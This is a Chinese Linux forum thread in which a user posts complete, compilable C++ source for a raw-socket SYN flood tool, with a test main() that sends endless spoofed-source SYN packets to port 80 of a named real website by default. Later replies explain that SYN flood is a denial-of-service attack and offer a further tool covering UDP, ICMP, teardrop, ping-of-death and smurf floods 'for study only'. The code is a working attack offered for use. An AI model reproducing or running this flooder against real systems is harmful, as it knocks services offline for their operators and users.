synflood

linux

最近无聊时写的简单的synflood工具，试一试：
文件：rawsocket.hpp+rawsocket.cpp

rawsocket.hpp

1. 
   
2. 
   
3. #ifndef                RAWSOCKET_H
   
4. #define                RAWSOCKET_H
   
5. 
   
6. #include        <netinet/in.h>
   
7. #include        <netinet/ip.h>
   
8. #include        <netinet/tcp.h>
   
9. 
   
10. #define        IP_DONT_FRAG        64        // htons(2<<13)         =  64
    
11. #define        TCP_WINDOW        65407        // htons(0x7fff) =  65407
    
12. 
    
13. class        CRawTcpSocket {
    
14. public:
    
15.         CRawTcpSocket( void ) throw();
    
16.         CRawTcpSocket( int sock );
    
17.         ~CRawTcpSocket();
    
18. 
    
19.         void        SetIpHeader( unsigned int saddr, unsigned int daddr, unsigned char protocol = IPPROTO_TCP, unsigned short frag = IP_DONT_FRAG, unsigned short id = 0, unsigned char ttl = 255 );
    
20.         void        SetTcpHeader( unsigned short sport, unsigned short dport, unsigned seq, unsigned int ack, const char *flag, unsigned short window = TCP_WINDOW, unsigned int urgp = 0 );
    
21. 
    
22.         void        SetIpOption( const unsigned char *opt, int len );
    
23.         void        SetTcpOption( const unsigned char *opt, int len );
    
24. 
    
25.         int        Send( const void *data, int len );
    
26.         void        Close( void )
    
27.         {
    
28.                 close( m_sock );
    
29.                 m_sock = -1;
    
30.         }
    
31. 
    
32. private:
    
33.         CRawTcpSocket( const CRawTcpSocket& );
    
34.         const CRawTcpSocket& operator=( const CRawTcpSocket& );
    
35. 
    
36.         void        Initialize( void );
    
37.         unsigned short        CheckSum( const unsigned short *ptr, int len );
    
38.         void        TcpCheckSum( void );
    
39. 
    
40. private:
    
41.         struct        iphdr        m_iph;
    
42.         struct        tcphdr        m_tcph;
    
43.         int                m_sock;
    
44.         int                m_ipoptlen;
    
45.         int                m_tcpoptlen;
    
46.         unsigned char        *m_ipopt;
    
47.         unsigned char        *m_tcpopt;
    
48. };
    
49. 
    
50. #endif        // RAWSOCKET_H
    
51. 
    

复制代码

rawsocket.cpp
编译：g++ -W -Wall -g -DTEST -o synflood rawsocket.cpp

1. 
   
2. 
   
3. #include        <cstring>
   
4. #include        <unistd.h>
   
5. #include        <sys/types.h>
   
6. #include        <sys/socket.h>
   
7. #include        <stdexcept>
   
8. #include        "rawsocket.hpp"
   
9. 
   
10. CRawTcpSocket::CRawTcpSocket( void ) throw()
    
11. {
    
12.         m_sock = socket( PF_INET, SOCK_RAW, IPPROTO_RAW );
    
13.         if ( m_sock < 0 ) throw std::runtime_error( "create raw socket error" );
    
14.         Initialize();
    
15. }
    
16. 
    
17. CRawTcpSocket::CRawTcpSocket( int sock )
    
18. {
    
19.         m_sock = sock;
    
20.         Initialize();
    
21. }
    
22. 
    
23. CRawTcpSocket::~CRawTcpSocket()
    
24. {
    
25.         close( m_sock );
    
26.         delete        []m_ipopt;
    
27.         delete        []m_tcpopt;
    
28. }
    
29. 
    
30. void        CRawTcpSocket::Initialize( void )
    
31. {
    
32.         shutdown( m_sock, SHUT_RD );
    
33.         bzero( &m_iph, sizeof(m_iph) );
    
34.         bzero( &m_tcph, sizeof(m_tcph) );
    
35.         m_ipopt = 0;
    
36.         m_tcpopt = 0;
    
37.         m_ipoptlen = 0;
    
38.         m_tcpoptlen = 0;
    
39. }
    
40. 
    
41. void        CRawTcpSocket::SetIpOption( const unsigned char *opt, int len )
    
42. {
    
43.         delete        []m_ipopt;
    
44.         m_ipopt = 0;
    
45.         if ( opt && len>0 && len<=40 && !(len%4) ) {
    
46.                 m_ipopt = new unsigned char[len];
    
47.                 memcpy( m_ipopt, opt, len );
    
48.                 m_ipoptlen = len;
    
49.         } else {
    
50.                 m_ipoptlen = 0;
    
51.         }
    
52. }
    
53. 
    
54. void        CRawTcpSocket::SetTcpOption( const unsigned char *opt, int len )
    
55. {
    
56.         delete        []m_tcpopt;
    
57.         m_tcpopt = 0;
    
58.         if ( opt && len>0 && len<=40 && !(len%4) ) {
    
59.                 m_tcpopt = new unsigned char[len];
    
60.                 memcpy( m_tcpopt, opt, len );
    
61.                 m_tcpoptlen = len;
    
62.         } else {
    
63.                 m_tcpoptlen = 0;
    
64.         }
    
65. }
    
66. 
    
67. void        CRawTcpSocket::SetIpHeader( unsigned int saddr, unsigned int daddr, unsigned char protocol, unsigned short frag, unsigned short id, unsigned char ttl )
    
68. {
    
69.         bzero( &m_iph, sizeof(m_iph) );
    
70.         m_iph.ihl = 5;
    
71.         m_iph.version = 4;
    
72.         m_iph.id = id;
    
73.         m_iph.frag_off = frag;
    
74.         m_iph.ttl = ttl;
    
75.         m_iph.protocol = protocol;
    
76.         m_iph.saddr = saddr;
    
77.         m_iph.daddr = daddr;
    
78. }
    
79. 
    
80. void        CRawTcpSocket::SetTcpHeader( unsigned short sport, unsigned short dport, unsigned int seq, unsigned int ack, const char *flag, unsigned short window, unsigned int urgp )
    
81. {
    
82.         bzero( &m_tcph, sizeof(m_tcph) );
    
83.         m_tcph.source = sport;
    
84.         m_tcph.dest = dport;
    
85.         m_tcph.seq = seq;
    
86.         m_tcph.ack_seq = ack;
    
87.         m_tcph.doff = 5;
    
88.         m_tcph.window = window;
    
89.         m_tcph.urg_ptr = urgp;
    
90.         if ( flag ) {
    
91.                 m_tcph.fin = (strchr(flag,'F'))?1:0;
    
92.                 m_tcph.syn = (strchr(flag,'S'))?1:0;
    
93.                 m_tcph.rst = (strchr(flag,'R'))?1:0;
    
94.                 m_tcph.psh = (strchr(flag,'P'))?1:0;
    
95.                 m_tcph.ack = (strchr(flag,'A'))?1:0;
    
96.                 m_tcph.urg = (strchr(flag,'U'))?1:0;
    
97.         }
    
98. }
    
99. 
    
100. unsigned short        CRawTcpSocket::CheckSum( const unsigned short *ptr, int len )
     
101. {
     
102.         unsigned int        sum = 0;
     
103.         unsigned short        odd = 0;
     
104. 
     
105.         while( len > 1 ) {
     
106.                 sum += *ptr++;
     
107.                 len -= 2;
     
108.         }
     
109. 
     
110.         if ( len ) {
     
111.                 *((unsigned char *)&odd) = *(unsigned char *)ptr;
     
112.                 sum += odd;
     
113.         }
     
114. 
     
115.         sum = (sum>>16) + (sum&0xffff);
     
116.         sum += (sum>>16);
     
117.         unsigned short ret = (~sum)&0xffff;
     
118.         return ret;
     
119. }
     
120. 
     
121. void        CRawTcpSocket::TcpCheckSum( void )
     
122. {
     
123.         struct        TcpPsdHeader {
     
124.                 unsigned int        saddr;
     
125.                 unsigned int        daddr;
     
126.                 unsigned char        zero;
     
127.                 unsigned char        protocol;
     
128.                 unsigned short        len;
     
129.         } psd;
     
130. 
     
131.         psd.saddr = m_iph.saddr;
     
132.         psd.daddr = m_iph.daddr;
     
133.         psd.zero = 0;
     
134.         psd.protocol = IPPROTO_TCP;
     
135.         psd.len = htons( 20+m_tcpoptlen );
     
136.         unsigned char        buf[72];
     
137.         memcpy( buf, &psd, sizeof(psd) );
     
138.         memcpy( buf+sizeof(psd), &m_tcph, 20 );
     
139.         if ( m_tcpopt )
     
140.                 memcpy( buf+sizeof(psd)+20, m_tcpopt, m_tcpoptlen );
     
141.         m_tcph.check = CheckSum( (const unsigned short *)buf, sizeof(psd)+20+m_tcpoptlen );
     
142. }
     
143. 
     
144. int        CRawTcpSocket::Send( const void *data, int len )
     
145. {
     
146.         if ( (!data&&len) || (data&&len<=0) || (data&&len>1460) ) return -1;
     
147. 
     
148.         if ( m_ipopt ) {
     
149.                 m_iph.ihl = (20+m_ipoptlen) >> 2;
     
150.         } else {
     
151.                 m_iph.ihl = 5;
     
152.         }
     
153. 
     
154.         if ( m_tcpopt ) {
     
155.                 m_tcph.doff = (20+m_tcpoptlen) >> 2;
     
156.         } else {
     
157.                 m_tcph.doff = 5;
     
158.         }
     
159. 
     
160.         TcpCheckSum();
     
161. 
     
162.         char        buf[1500];
     
163.         int        dlen = 0;
     
164. 
     
165.         memcpy( buf, &m_iph, 20 );
     
166.         dlen += 20;
     
167.         if ( m_ipopt ) {
     
168.                 memcpy( buf+dlen, m_ipopt, m_ipoptlen );
     
169.                 dlen += m_ipoptlen;
     
170.         }
     
171. 
     
172.         memcpy( buf+dlen, &m_tcph, 20 );
     
173.         dlen += 20;
     
174.         if ( m_tcpopt ) {
     
175.                 memcpy( buf+dlen, m_tcpopt, m_tcpoptlen );
     
176.                 dlen += m_tcpoptlen;
     
177.         }
     
178. 
     
179.         int        rest = 1500-dlen;
     
180.         rest = (len<rest)?len:rest;
     
181.         memcpy( buf+dlen, data, rest );
     
182.         dlen += rest;
     
183. 
     
184.         struct        sockaddr_in        addr;
     
185.         bzero( &addr, sizeof(addr) );
     
186.         addr.sin_family = AF_INET;
     
187.         addr.sin_addr.s_addr = m_iph.daddr;
     
188.         int ret = sendto( m_sock, buf, dlen, 0, (struct sockaddr *)&addr, sizeof(addr) );
     
189. 
     
190.         if ( m_ipopt ) {
     
191.                 delete        []m_ipopt;
     
192.                 m_ipopt = 0;
     
193.                 m_ipoptlen = 0;
     
194.         }
     
195. 
     
196.         if ( m_tcpopt ) {
     
197.                 delete        []m_tcpopt;
     
198.                 m_tcpopt = 0;
     
199.                 m_tcpoptlen = 0;
     
200.         }
     
201. 
     
202.         return ret;
     
203. }
     
204. 
     
205. #ifdef        TEST
     
206. 
     
207. #include        <time.h>
     
208. #include        <cstdlib>
     
209. #include        <netdb.h>
     
210. #include        <arpa/inet.h>
     
211. #include        <iostream>
     
212. 
     
213. #include        <signal.h>
     
214. 
     
215. int        count = 0;
     
216. 
     
217. void        AppExit( int )
     
218. {
     
219.         std::cout << "total send " << count << " packets" << std::endl;
     
220.         exit( 0 );
     
221. }
     
222. 
     
223. int        main( int argc, char **argv )
     
224. {
     
225.         char        victim[64];
     
226.         strcpy( victim, "www.linuxsir.cn" );
     
227.         if ( argc > 1 ) strcpy( victim, argv[1] );
     
228. 
     
229.         struct        hostent        *host = gethostbyname( victim );
     
230.         if ( !host ) {
     
231.                 herror( "gethostbyname" );
     
232.                 return -1;
     
233.         }
     
234.         unsigned int        daddr;
     
235.         memcpy( &daddr, host->h_addr, host->h_length );
     
236. 
     
237.         signal( SIGINT, AppExit );
     
238.         srandom( time(0) );
     
239. 
     
240.         try
     
241.         {
     
242.                 CRawTcpSocket        raw;
     
243.                 unsigned int        saddr, ack;
     
244.                 unsigned short        sport, dport = htons(80);
     
245.                 while( 1 ) {
     
246.                         saddr = (unsigned int)random();
     
247.                         ack = (unsigned int)random();
     
248.                         sport = random()&0xffff;
     
249.                         sport = (sport<1025)?htons(sport+1025):htons(sport);
     
250. 
     
251.                         raw.SetIpHeader( saddr, daddr );
     
252.                         raw.SetTcpHeader( sport, dport, ack, 0, "S" );
     
253.                         ack = raw.Send( 0, 0 );
     
254.                         if ( ack > 0 ) count++;
     
255.                         struct        timespec        req;
     
256.                         req.tv_sec = 0;
     
257.                         req.tv_nsec = 1000;
     
258.                         nanosleep( &req, 0 );
     
259.                 }
     
260.         }
     
261.         catch ( std::exception &e )
     
262.         {
     
263.                 std::cerr << e.what() << std::endl;
     
264.         }
     
265.         catch ( ... )
     
266.         {
     
267.         }
     
268. 
     
269.         return 0;
     
270. }
     
271. 
     
272. #endif        // TEST
     
273. 
     

复制代码

kj501

楼主把unp看完了？我是买了书却没时间看。

kodo

synflood到底是什么工具

devel

有什么用:ask  :ask  至少给我们莱鸟解释一下吧，

fog_proxy

synflood是一种dos(拒绝服务)攻击,我曾经在linux也写过一个工具，包括synflood,teardrop,ping of death,udpflood,icmpflood,smurf...，有兴趣的话可以贴给大家看看。

devel

我虽然不懂，但有兴趣看看。请贴出来。;);)

thanks in advance.

shangxd

C++的代码看不懂，但我有C下的synflood。

devel

什么样的源代码大家都欢迎你贴出来的。呵呵~~ 不止是我一个人看嘛

无双

是的
欢迎mhkgbmgu我想大家都会有用到的时候

fog_proxy

这两天比较忙,没有上来,既然有兄弟感兴趣,我就把自己写的tool贴上来大家看看把,用C写的,在linux下编译通过,包括了syn flood,udp flood,icmp flood,teardrop,ping of death,targa3等攻击(具体看sf_attack.c).
仅供学习使用,请勿用来破坏!